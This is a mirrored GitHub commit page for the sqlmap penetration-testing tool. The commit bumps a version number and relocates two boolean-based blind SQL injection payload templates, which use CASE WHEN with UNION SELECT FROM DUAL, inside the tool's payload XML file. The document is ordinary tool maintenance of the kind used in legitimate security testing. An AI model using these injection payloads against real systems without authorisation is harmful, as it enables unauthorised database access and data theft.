Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit acc1277

Browse files
stamparmstamparm
committed
Minor update
1 parent 935cb9c commit acc1277

2 files changed

Lines changed: 34 additions & 33 deletions

File tree

lib/core/settings.py

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -19,7 +19,7 @@
1919
from lib.core.revision import getRevisionNumber
2020

2121
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
22-
VERSION = "1.0.5.105"
22+
VERSION = "1.0.5.106"
2323
REVISION = getRevisionNumber()
2424
STABLE = VERSION.count('.') <= 2
2525
VERSION_STRING = "sqlmap/%s#%s" % (VERSION, "stable" if STABLE else "dev")

xml/payloads/01_boolean_blind.xml

Lines changed: 33 additions & 32 deletions
Original file line numberDiff line numberDiff line change
@@ -489,38 +489,6 @@ Tag: <test>
489489
<!-- End of boolean-based blind tests - WHERE or HAVING clause -->
490490

491491
<!-- Boolean-based blind tests - Parameter replace -->
492-
<test>
493-
<title>Boolean-based blind - Parameter replace (DUAL)</title>
494-
<stype>1</stype>
495-
<level>1</level>
496-
<risk>1</risk>
497-
<clause>1,2,3</clause>
498-
<where>3</where>
499-
<vector>(CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</vector>
500-
<request>
501-
<payload>(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</payload>
502-
</request>
503-
<response>
504-
<comparison>(CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</comparison>
505-
</response>
506-
</test>
507-
508-
<test>
509-
<title>Boolean-based blind - Parameter replace (DUAL) (original value)</title>
510-
<stype>1</stype>
511-
<level>2</level>
512-
<risk>1</risk>
513-
<clause>1,2,3</clause>
514-
<where>3</where>
515-
<vector>(CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</vector>
516-
<request>
517-
<payload>(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</payload>
518-
</request>
519-
<response>
520-
<comparison>(CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</comparison>
521-
</response>
522-
</test>
523-
524492
<test>
525493
<title>MySQL &gt;= 5.0 boolean-based blind - Parameter replace</title>
526494
<stype>1</stype>
@@ -948,6 +916,39 @@ Tag: <test>
948916
<dbms>SAP MaxDB</dbms>
949917
</details>
950918
</test>
919+
920+
<!-- Works in MySQL, Oracle, etc. -->
921+
<test>
922+
<title>Boolean-based blind - Parameter replace (DUAL)</title>
923+
<stype>1</stype>
924+
<level>2</level>
925+
<risk>1</risk>
926+
<clause>1,2,3</clause>
927+
<where>3</where>
928+
<vector>(CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</vector>
929+
<request>
930+
<payload>(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</payload>
931+
</request>
932+
<response>
933+
<comparison>(CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</comparison>
934+
</response>
935+
</test>
936+
937+
<test>
938+
<title>Boolean-based blind - Parameter replace (DUAL) (original value)</title>
939+
<stype>1</stype>
940+
<level>3</level>
941+
<risk>1</risk>
942+
<clause>1,2,3</clause>
943+
<where>3</where>
944+
<vector>(CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</vector>
945+
<request>
946+
<payload>(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</payload>
947+
</request>
948+
<response>
949+
<comparison>(CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</comparison>
950+
</response>
951+
</test>
951952
<!-- End of boolean-based blind tests - Parameter replace -->
952953

953954
<!-- Boolean-based blind tests - ORDER BY, GROUP BY clause -->

0 commit comments

Comments
 (0)